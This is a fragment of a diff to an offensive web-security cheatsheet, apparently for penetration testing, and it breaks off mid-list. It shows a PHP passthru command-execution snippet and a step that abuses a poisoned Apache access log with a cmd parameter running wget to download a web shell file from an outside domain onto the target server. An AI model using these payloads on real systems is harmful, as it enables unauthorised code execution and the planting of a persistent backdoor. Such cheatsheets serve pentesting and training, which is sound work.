brianlam38/Sec-Cheatsheets/Web_Advanced.md

 <?php passthru(['ls -l']); ?>
 ```

-4. With command execution, use wget to upload your own files to the server:
+STEP #4: With command execution, use wget to upload your own files to the server:
 ```
 /var/log/apache2/access.log&cmd=wget http://somedomain.com/shellfile.php
 OR